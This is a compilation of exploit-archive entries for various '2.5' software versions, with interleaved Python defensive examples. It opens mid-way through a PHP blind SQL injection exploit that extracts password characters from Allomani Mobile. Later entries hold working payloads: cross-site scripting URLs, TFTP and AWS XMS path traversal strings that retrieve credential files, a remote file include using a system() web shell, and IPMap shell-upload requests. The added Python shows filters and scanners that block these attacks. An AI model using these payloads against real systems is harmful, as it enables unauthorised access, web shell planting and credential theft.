for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),12,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
for ($i = 1; $i <= 122; $i++) {
$qest = QAB_GET(QABANDI($host1,$userdir1,"' or ascii(substring((select password from mobile_user limit 0,1),13,1))='".$i));
if ($qest == $truths) {
echo chr($i);
}
}
echo "\n\n this exploit is made to give you the first 8 chars of username and first 13 of password";
?>
Allomani Mobile version 2.5 remote blind SQL injection exploit.
indoushka/Caricatier 2.5 Cross Site Scripting
========================================================================================
| # Title : caricatier 2.5 Cross Site Scripting Vulnerability
| # Author : indoushka
| # email : indoushka@hotmail.com
| # Home : Souk Naamane - 04325 - Oum El Bouaghi - Algeria -(00213771818860)
| # Web Site : www.iq-ty.com
| # Script : Using the Caricatier script, version : Version 2.5 / http://www.php-ar.com/
| # Tested on: windows SP2 Français V.(Pnx2 2.0) + Linux Français v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
| # Exploit :
| 1- http://server/caricatier/comment.php?op=CatID%3D0&CatName=1<ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1
| 2- http://server/caricatier/comment.php?op=CatID%3D0&CatName=indoushka@hotmail.com-00213771818860&CaricatierID=1
| 3- http://server/caricatier/view_caricatier.php?op=open&CatID=1%00"'><ScRiPt%20%0d%0a>alert(213771818860)%3B</ScRiPt>&CaricatierID=1&CatName=indoushka@hotmail.com-00213771818860
| 4- http://server/caricatier/view_caricatier.php?op=open&CatID=0&CaricatierID=1&CatName=1<img+src=http://server/jpg.jpg+onload=alert(213771818860)>
================================ Dz-Ghost Team ========================================
Greetz : all my friend * Dos-Dz * Snakespc * His0k4 * Hussin-X * Str0ke * Saoucha * Star08
-------------------------------------------------------------------------------------------
Caricatier version 2.5 suffers from a cross site scripting vulnerability.
chr1x/TFTP Desktop 2.5 Directory Traversal ( na)
+------------------------------------------------------------------------+
|                  CubilFelino Security Research Labs                    |
|                        proudly presents...                             |
+------------------------------------------------------------------------+
Author: chr1x (chr1x@sectester.net)
Date: August 30, 2010
Affected operating system/software, including full version details:
TFTP Desktop version 2.5, tested on Windows XP PRO SP3
Download: http://www.mynet2.com/soft/Software%20Archive/TFTP%20Server/tftp_desktop_free.exe
How the vulnerability can be reproduced:
Attack strings below:
[*] Testing Path: .../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: .../.../.../.../.../.../.../.../boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!
[*] Testing Path: ...\...\...\...\...\...\...\...\boot.ini <- Vulnerable string!!
Confirmation log:
root@olovely:/# tftp
tftp> connect
(to) 192.168.1.53
tftp> ascii
tftp> get
(files) .../.../.../.../.../.../boot.ini
Received 211 bytes in 0.0 seconds
tftp> quit
What impact the vulnerability has on the vulnerable system:
* High, since when exploiting the vulnerability the attacker is able to get full access to the victim filesystem.
TFTP Desktop version 2.5 suffers from a directory traversal vulnerability.
team ' and 1=1--/PHPCollab 2.5 Unauthenticated Access ( na)
# Date: 3/5/2012
# Author: team ' and 1=1--
# Software Link: http://www.phpcollab.com/
# Version: 2.5
# Vulnerability was found during the AthCon IT Security Conference CTF
# CTF organizer: echothrust
We identified that the PhpCollab application installed under http://192.0.0.2/phpcollab/ allows unauthenticated access to all authenticated content. Specifically, when requesting a URL that requires authentication, such as http://192.0.0.2/phpcollab/clients/listclients.php, the server responds with a redirect (Location header) to '../index.php?session=false', which displays a session error and the login form. However, upon inspecting the response to that request, we can clearly see that all the application data is returned in its body.
This issue allows us to access a number of PhpCollab pages without any authentication (it must be noted that some of the administration pages are not available when exploiting the issue). As an example, by using the following command an attacker can retrieve the phpinfo of the server:
curl -i http://192.0.0.2/phpcollab/administration/phpinfo.php
phpinfo reveals that the system is: Linux lamp.acmesec.fake 3.1.0-7.fc16.i686.PAE #1 SMP Tue Nov 1 20:53:45 UTC 2011 i686
PHPCollab version 2.5 fails to properly block access to data on the system.
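The behaviour described above is the classic "Location header without exit" bug: the script decides to redirect but keeps executing, so the 3xx response carries the protected page in its body, and any client that does not follow redirects (curl without -L, Burp, a script) reads it. The Python below is an added example, not PHPCollab code: it models a vulnerable and a fixed handler as plain functions, parses `curl -i` style output, and implements the check a tester would run over responses fetched without following redirects. The page content and the response text are constructed.

```python
from typing import Dict, Tuple

Response = Tuple[int, Dict[str, str], str]

# Constructed page content standing in for clients/listclients.php output.
PROTECTED_HTML = (
    "<html><body><h1>Clients</h1><table>"
    "<tr><td>ACME Corp</td><td>acme@example.invalid</td></tr>"
    "<tr><td>Globex</td><td>globex@example.invalid</td></tr>"
    "</table></body></html>"
)
LOGIN_REDIRECT = "../index.php?session=false"


def listclients_vulnerable(session: Dict[str, str]) -> Response:
    """The bug class: the redirect header is set, but nothing stops the
    script, so the protected page is still rendered into the 302 body."""
    status, headers = 200, {}
    if "user" not in session:
        status, headers = 302, {"Location": LOGIN_REDIRECT}
        # a `return` (exit() in PHP) is missing here
    body = PROTECTED_HTML
    return status, headers, body


def listclients_fixed(session: Dict[str, str]) -> Response:
    """Return immediately after deciding to redirect."""
    if "user" not in session:
        return 302, {"Location": LOGIN_REDIRECT}, ""
    return 200, {}, PROTECTED_HTML


def parse_raw_response(raw: str) -> Response:
    """Turn `curl -i` output (status line, headers, blank line, body) into a tuple."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().title()] = value.strip()
    return status, headers, body


def redirect_leaks_body(resp: Response, max_stub_bytes: int = 32) -> bool:
    """Flag a redirect whose body is more than a short 'moved' stub.
    Only meaningful for responses fetched WITHOUT following redirects."""
    status, headers, body = resp
    return (300 <= status < 400
            and "Location" in headers
            and len(body.strip()) > max_stub_bytes)


if __name__ == "__main__":
    for name, fn in (("vulnerable", listclients_vulnerable), ("fixed", listclients_fixed)):
        print(name, "leaks:", redirect_leaks_body(fn({})))
```

The threshold exists because many frameworks legitimately emit a one-line "Moved" stub with a redirect; anything larger than that on an authenticated URL deserves a look at the body, which is exactly what the advisory's `curl -i` does.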
High-Tech Bridge SA/AWS XMS 2.5 Path Traversal ( na)
Advisory ID: HTB23147
Product: AWS XMS
Vendor: http://www.aws-dms.com
Vulnerable Version(s): 2.5 and probably prior
Tested Version: 2.5
Vendor Notification: March 6, 2013
Vendor Patch: March 16, 2013
Public Disclosure: March 27, 2013
Vulnerability Type: Path Traversal [CWE-22]
CVE Reference: CVE-2013-2474
Risk Level: Medium
CVSSv2 Base Score: 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
Solution Status: Fixed by Vendor
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
High-Tech Bridge Security Research Lab discovered a path traversal vulnerability in AWS XMS, which can be exploited to read the contents of arbitrary files.
1) Path Traversal in AWS XMS: CVE-2013-2474
The vulnerability exists due to insufficient filtering of the "what" HTTP GET parameter passed to the "/importer.php" script before it is used in the PHP "file()" function. A remote attacker can read the contents of arbitrary files on the target system.
The vulnerable script sets a "text/javascript" Content-Type for the output data, which makes exploitation of the vulnerability via a web browser inconvenient. Exploitation via the telnet or wget utilities is easier.
The following PoC (Proof of Concept) code uses the wget utility to download the source code of the "/default.php" file, which contains application configuration data and the administrator's credentials:
wget http://[host]/importer.php?what=defaults.php%00.js
To bypass protections against NULL-byte injection (implemented in PHP 5.3.4 and later versions) or an enabled "magic_quotes_gpc", alternative techniques based on path normalization and length restrictions can be used.
The second PoC uses a large number of '/' characters (4096 is sufficient for the majority of platforms) to bypass the restrictions and get the source code of the "/default.php" file:
wget http://[host]/importer.php?what=defaults.php///////...//////.js
-----------------------------------------------------------------------------------------------
Solution:
Upgrade to AWS XMS 2.6
More Information: http://www.aws-dms.com/temp.php?use=templates/download.xml#xms-2.6
-----------------------------------------------------------------------------------------------
References:
[1] High-Tech Bridge Advisory HTB23147 - https://www.htbridge.com/advisory/HTB23147 - Path Traversal in AWS XMS.
[2] AWS XMS - http://www.aws-dms.com/ - XMS is an online visual web development environment and framework, providing a web application base, with multi-language support, based on XML.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
-----------------------------------------------------------------------------------------------
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
AWS XMS version 2.5 suffers from a path traversal vulnerability.
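The TFTP Desktop and AWS XMS advisories above show three ways a naive traversal filter fails: dot sequences other than exactly ".." (".../..."), backslashes treated as separators on Windows, and a suffix check applied to the raw string while the runtime opens a truncated or normalised one (the %00 and slash-flood tricks). The Python below is an added example, not either vendor's fix: a server-side resolver that applies the checks in an order that defeats all three, run over the advisories' own attack strings plus a few constructed controls. The root directory is a temporary directory created by the demo, and the allowed-suffix list is an assumption standing in for the ".js" that importer.php appears to expect.

```python
import os
import posixpath
import re
import tempfile


class PathRejected(ValueError):
    pass


def safe_resolve(root: str, requested: str, allowed_suffixes=(".js",),
                 allow_subdirs: bool = False) -> str:
    """Map a client-supplied name onto a file under `root`, or raise.
    Each rule corresponds to a trick in the two advisories."""
    # %00 works because the runtime truncates at the first NUL (fixed in
    # PHP 5.3.4).  Refuse any control byte rather than rely on that.
    if any(ord(c) < 0x20 or c == "\x7f" for c in requested):
        raise PathRejected("control character in path")
    # TFTP Desktop accepted both .../.../ and ...\...\ : treat '\' as '/'.
    path = requested.replace("\\", "/")
    if path.startswith("/") or re.match(r"^[A-Za-z]:", path):
        raise PathRejected("absolute path")
    # '..' is the textbook case; '...' was enough for TFTP Desktop.  Any
    # segment consisting only of dots is refused before normalisation.
    for seg in path.split("/"):
        if seg and set(seg) == {"."}:
            raise PathRejected("dot-only segment %r" % seg)
    # Collapse '////' runs first, so the suffix check sees the same string
    # the filesystem will (the 4096-slash trick targets exactly this gap).
    path = posixpath.normpath(path)
    if not allow_subdirs and "/" in path:
        raise PathRejected("subdirectories not allowed")
    if allowed_suffixes and not path.endswith(tuple(allowed_suffixes)):
        raise PathRejected("suffix not allowed")
    # Final containment check on the resolved filesystem path.
    root_real = os.path.realpath(root)
    target = os.path.realpath(os.path.join(root_real, path))
    if os.path.commonpath([root_real, target]) != root_real:
        raise PathRejected("escapes root")
    return target


def classify(root, names, **kw):
    """{name: 'ok' | 'rejected: reason'} for a batch of requested names."""
    out = {}
    for n in names:
        try:
            safe_resolve(root, n, **kw)
            out[n] = "ok"
        except PathRejected as e:
            out[n] = "rejected: " + str(e)
    return out


# The advisories' attack strings plus constructed controls.
ATTACK_STRINGS = [
    ".../.../.../boot.ini",                                 # TFTP Desktop
    "...\\...\\...\\...\\boot.ini",                         # TFTP Desktop, backslash form
    "../../../../etc/passwd",                               # classic
    "defaults.php\x00.js",                                  # AWS XMS, NUL truncation
    "defaults.php" + "/" * 40 + "..." + "/" * 40 + ".js",   # AWS XMS, slash flood
    "defaults.php" + "/" * 40 + ".js",                      # constructed: slashes only
    "C:/Windows/boot.ini",                                  # constructed: drive letter
    "app.js",                                               # constructed: benign
]


def demo() -> dict:
    root = tempfile.mkdtemp()   # empty root; realpath does not need the files to exist
    return classify(root, ATTACK_STRINGS, allowed_suffixes=(".js", ".ini"))


if __name__ == "__main__":
    for name, verdict in demo().items():
        print(repr(name), "->", verdict)
```

The order matters: the suffix check runs after normpath, and the containment check runs on the realpath, so symlinks inside the root are also caught. For a TFTP server that must serve subdirectories, pass allow_subdirs=True and keep the other rules.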
Federico Fazzi/cms-bandits2.5.txt ( na)
-----------------------------------------------------
Advisory id: FSA:006
Author: Federico Fazzi
Date: 08/06/2006, 11:09
Sinthesis: cms-bandits 2.5, Remote command execution
Type: high
Product: http://sourceforge.net/projects/cms-bandits
Patch: unavailable
-----------------------------------------------------
1) Description:
An error occurs in td.php:
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
and in img.php:
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
Requires register_globals = On.
Users can include a remote file because $spaw_root is never declared before use, so with register_globals a request parameter supplies its value.
2) Proof of concept:
http://127.0.0.1/cms/dialogs/td.php?spaw_root=[cmd_with_final_slash]
http://127.0.0.1/cms/dialogs/img.php?spaw_root=[cmd_with_final_slash]
[cmd_with_final_slash] = http://example/cmd.php/
cmd.php = <?php system("commands here"); /* or passthru() */ ?>
The trailing slash matters: the include becomes http://example/cmd.php/class/util.class.php, which the attacker's web server still routes to cmd.php (the remainder is PATH_INFO).
3) Solution:
Define and sanitize the variable in img.php and td.php before it is used.
cms-bandits 2.5 is vulnerable to remote command execution in td.php and img.php if register_globals is on.
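The root cause above is an include whose path starts with a variable the file never sets, which register_globals turns into a request parameter. The Python below is an added example, not cms-bandits code: a small static check that flags include/require statements rooted in a variable the same PHP file never assigns, declares global, or receives as a parameter. It is a regular-expression model rather than a PHP parser (extract(), list() and variable variables are not handled), and the two PHP samples are constructed to mirror the quoted lines of dialogs/td.php.

```python
import re

INCLUDE_RE = re.compile(
    r"\b(?:include|include_once|require|require_once)\s*\(?\s*\$(\w+)", re.I)
# Ways a variable becomes defined in the file: assignment (but not ==, ===),
# a `global` declaration, or a function parameter.  Rough model, not a parser.
ASSIGN_RE = re.compile(r"\$(\w+)\s*[.+\-]?=(?!=)")
GLOBAL_RE = re.compile(r"\bglobal\s+\$(\w+)")
PARAM_RE = re.compile(r"\bfunction\s+\w+\s*\(([^)]*)\)")


def defined_vars(php_source: str) -> set:
    names = set(ASSIGN_RE.findall(php_source))
    names |= set(GLOBAL_RE.findall(php_source))
    for params in PARAM_RE.findall(php_source):
        names |= set(re.findall(r"\$(\w+)", params))
    return names


def unassigned_include_vars(php_source: str):
    """[(line_no, var)] for include/require paths rooted in a variable the
    file never defines.  With register_globals=On such a variable is
    attacker-controlled; if the runtime allows URLs in include (allow_url_fopen
    in PHP of that era, allow_url_include since 5.2) the include is remote."""
    defined = defined_vars(php_source)
    findings = []
    for no, line in enumerate(php_source.splitlines(), 1):
        for var in INCLUDE_RE.findall(line):
            if var not in defined:
                findings.append((no, var))
    return findings


# Constructed samples in the shape of dialogs/td.php: as described in the
# advisory, and with $spaw_root defined before use.
VULNERABLE_TD_PHP = """<?php
// constructed: mirrors the two includes quoted in the advisory
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
$util = new SpawUtil();
?>"""

FIXED_TD_PHP = """<?php
$spaw_root = dirname(__FILE__).'/../';   // fixed path, not a request value
include $spaw_root.'class/util.class.php';
include $spaw_root.'class/lang.class.php';
$util = new SpawUtil();
?>"""


if __name__ == "__main__":
    print("vulnerable:", unassigned_include_vars(VULNERABLE_TD_PHP))
    print("fixed:     ", unassigned_include_vars(FIXED_TD_PHP))
```

Run it over every .php file in a tree to triage register_globals-era code; a hit is a candidate, not a confirmed RFI, because the variable may be defined by an earlier include, which this per-file model cannot see.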
Benjamin Kunz Mejri/IPMap 2.5 Shell Upload ( na)
Title:
======
IPMap v2.5 iPad iPhone - Arbitrary File Upload Web Vulnerabilities
Date:
=====
2013-02-18
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=866
VL-ID:
=====
866
Common Vulnerability Scoring System:
====================================
6.3
Introduction:
=============
IPMap - IP Address Lookup Details & HTTP Wireless File Sharing with latest WorldWide IP database & FREE Monthly update.
Accuracy: Over 99.8% on a country level and 83% on a city level for the US within a 25 mile radius.
Features:
Auto Detect & Lookup
Your Real IP address
IP address Hostname
IP address Country Code
... ... ...
IP address Area Code
IP location Map
HTTP Wireless File Sharing
iTunes File Sync
Web Upload File Support
Customizable Background from your Photos Album
(Copy of the Homepage: https://itunes.apple.com/us/app/ipmap-ip-address-lookup-details/id416041538 )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered an arbitrary file upload vulnerability in the mobile IPMap v2.5 app for the Apple iPad & iPhone.
Report-Timeline:
================
2013-02-18: Public Disclosure
Status:
========
Published
Affected Products:
==================
Apple AppStore
Product: IPMap - iPad iPhone 2.5
Exploitation-Technique:
=======================
Remote
Severity:
=========
Critical
Details:
========
A local file include and an arbitrary file upload web vulnerability via the POST request method were detected in the mobile IPMap v2.5 app
for the Apple iPad & iPhone. The vulnerability allows remote attackers, via the POST method, to inject local app webserver folder paths in order
to request unauthorized local webserver files.
1.1
The main vulnerability is located in the upload file script of the webserver (http://192.168.0.10:6123/) when it processes a manipulated
filename sent via the POST request method. The injected path or file request is executed when the file index listing
of the wifi web application webserver is viewed.
1.2
Remote attackers can also plant mobile webshells without authorization by using multiple file extensions (pentest.php.js.gif) when
uploading (submitting) via the POST request method. The attacker uploads a file with a double or multiple extension and, in a second step, accesses
the file via the webserver's directory listing to compromise the Apple iPhone or iPad.
Exploitation of the local file include web vulnerability requires neither user interaction nor a privileged user account.
Successful exploitation of the web vulnerabilities results in app/service manipulation and iPad or iPhone compromise via file
include or unauthorized file (webshell) upload attacks.
Vulnerable Application(s):
[+] WiFilet v1.2 - ITunes or AppStore (Apple)
Vulnerable Module(s):
[+] File Upload via Submit (Web Server) [Remote]
Vulnerable Parameter(s):
[+] file > filename
Affected Module(s):
[+] File Dir Index - Listing
Proof of Concept:
=================
Both vulnerabilities can be exploited by remote attackers without a privileged application user account and without user interaction.
For demonstration or reproduction ...
1.1
PoC: (POST)
-----------------------------307341202725627
Content-Disposition: form-data; name="file"; filename="../../../../cmd>home>tmp%00<'.png"
Content-Type: image/png
ÿØÿà
Review: File Dir Listing
<html><head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"><title>IPMap</title>
<style>body { background-color:#f0f7fd; font-family:Tahoma,Arial,Helvetica,sans-serif;
font-size:18x; padding:15px; margin-left:15%; margin-right:15%; } </style></head><body>
<h2 style="background-color:#6897ff; margin:0; color:#fff; padding:5px 10px; border: 1px outset #aaa;border-bottom: 0px;">IPMap</h2>
<h4 style="background-color:#6897ff;margin:0; color:#fff; padding:0px 10px 8px 10px; border: 1px outset #aaa; border-top: 0px;">
The following files are hosted live from the iPhone's Docs folder.</h4><p><table style="text-align:center; border-color:#9bc0d2;
background:#f0f7fd; color:#4e697a; margin:0 auto;" border="1" cellpadding="0" cellspacing="0"><tbody><tr height="30"><td width="400">
<strong>File Name</strong></td><td width="400"><strong>File Info</strong></td></tr><tr height="30">
<td><a href="http://192.168.0.10:6123/../../../../cmd>home>tmp%00<'">%20%20%20%20&"><iframe src="../../../../cmd>home>tmp%00<'">%20%20%20%20&">
%20%20%20%20</a></td><td>(27.3 Kb, 2013-02-07 07:00:31 +0000)</td></tr></table></p><form action=""
method="post" enctype="multipart/form-data" name="form1"
id="form1"><table border="0" cellpadding="0" cellspacing="0"
style="text-align:center; margin:0 auto;"><tr
height="50"><td width="400"><label>upload file<input
type="file" name="file" id="file" /></label></td><td
width="400"><label><input type="submit" name="button"
id="button" value="Submit" /> <font size="-1">* Please do NOT
upload index.htm or
index.html</font></label></td></tr></table></form></body></html>
</iframe></a></td></tr></tbody></table></p></body></html>
1.2
PoC: (POST)
-----------------------------307341202725627
Content-Disposition: form-data; name="file"; filename="pentest.php.js.html.htm.xml.png"
Content-Type: image/gif
Reference(s):
http://192.168.0.10:6123/
Risk:
=====
The security risk of the arbitrary file upload web vulnerability via POST request method is estimated as critical.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.
Copyright © 2013 | Vulnerability Laboratory
--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com
IPMap version 2.5 suffers from remote shell upload vulnerabilities.
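The two PoCs above attack the same field: the filename in a multipart Content-Disposition header, once with a traversal path plus %00 and once with a chain of extensions. The Python below is an added example, not IPMap code: it parses the filename out of a multipart body in the shape of the PoCs, then applies the receiver-side policy that would have stopped both (basename only, no NUL, exactly one allow-listed extension, and the file's leading bytes must agree with that extension rather than with the attacker-chosen Content-Type). The delimiter line is the one shown in the PoCs; the multipart bodies, payload bytes and allow-list are constructed.

```python
import posixpath
import re

# The delimiter line exactly as it appears in the PoCs above; the boundary
# token is that line without its leading "--".
DELIMITER_LINE = "-----------------------------307341202725627"
BOUNDARY = DELIMITER_LINE[2:]

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}           # assumed upload policy
MAGIC = {b"\x89PNG": "png", b"\xff\xd8\xff": "jpg", b"GIF8": "gif"}
CANONICAL = {"jpeg": "jpg"}
SAFE_CHARS = re.compile(r"[^A-Za-z0-9_-]")


def iter_parts(body: bytes, boundary: str):
    """Yield (headers, payload) per part.  Header names are lower-cased."""
    delim = ("--" + boundary).encode()
    for chunk in body.split(delim)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter
            break
        head, _, payload = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        if payload.endswith(b"\r\n"):        # CRLF that precedes the next delimiter
            payload = payload[:-2]
        headers = {}
        for line in head.decode("latin-1").split("\r\n"):
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        yield headers, payload


def raw_filename(headers: dict) -> str:
    """The filename as the client sent it, traversal and all."""
    m = re.search(r'filename="((?:[^"\\]|\\.)*)"', headers.get("content-disposition", ""))
    return m.group(1) if m else ""


def sanitize_filename(name: str) -> str:
    """Basename only, one allow-listed extension, safe characters elsewhere."""
    if "\x00" in name or "%00" in name.lower():
        raise ValueError("NUL byte in filename")
    base = posixpath.basename(name.replace("\\", "/"))   # drops ../../../../
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem:
        raise ValueError("no extension")
    ext = CANONICAL.get(ext.lower(), ext.lower())
    if ext not in ALLOWED_EXT:
        raise ValueError("extension %r not allowed" % ext)
    # Dots inside the stem become '_', so pentest.php.js.html.htm.xml.png can
    # no longer be matched as .php by a handler that reads extensions left to right.
    return SAFE_CHARS.sub("_", stem)[:64] + "." + ext


def sniff(payload: bytes):
    for magic, kind in MAGIC.items():
        if payload.startswith(magic):
            return kind
    return None


def process_upload(body: bytes):
    """[(raw_filename, outcome)] for every part of an upload body."""
    results = []
    for headers, payload in iter_parts(body, BOUNDARY):
        raw = raw_filename(headers)
        try:
            stored = sanitize_filename(raw)
            # The part's Content-Type is attacker-chosen (PoC 1.2 sends
            # image/gif for a .png name); trust the bytes instead.
            if sniff(payload) != stored.rsplit(".", 1)[1]:
                raise ValueError("content does not match extension")
            results.append((raw, "stored as " + stored))
        except ValueError as e:
            results.append((raw, "rejected: " + str(e)))
    return results


def build_body(parts) -> bytes:
    """Assemble a multipart body in the shape of the PoCs above."""
    out = b""
    for filename, ctype, payload in parts:
        out += (DELIMITER_LINE.encode() + b"\r\n"
                + b'Content-Disposition: form-data; name="file"; filename="'
                + filename.encode("latin-1") + b'"\r\n'
                + b"Content-Type: " + ctype.encode() + b"\r\n\r\n"
                + payload + b"\r\n")
    return out + DELIMITER_LINE.encode() + b"--\r\n"


# Constructed parts: the two PoC filenames plus controls.  Payloads are made up;
# the first one reuses the JPEG header bytes (FF D8 FF E0) shown in PoC 1.1.
DEMO_PARTS = [
    ("../../../../cmd>home>tmp%00<'.png", "image/png", b"\xff\xd8\xff\xe0"),   # PoC 1.1
    ("pentest.php.js.html.htm.xml.png", "image/gif", b"\x89PNG\r\n\x1a\n"),    # PoC 1.2
    ("shell.php", "image/gif", b"GIF89a<?php echo 'x'; ?>"),
    ("holiday.png", "image/png", b"\xff\xd8\xff\xe0"),                         # wrong bytes
    ("holiday.jpg", "image/jpeg", b"\xff\xd8\xff\xe0"),
]


def demo():
    return process_upload(build_body(DEMO_PARTS))


if __name__ == "__main__":
    for raw, outcome in demo():
        print(repr(raw), "->", outcome)
```

Storing under a server-generated name (a random token plus the vetted extension) is the stricter variant; the stem rewriting above is kept so the stored name stays recognisable while still defeating multi-extension handlers.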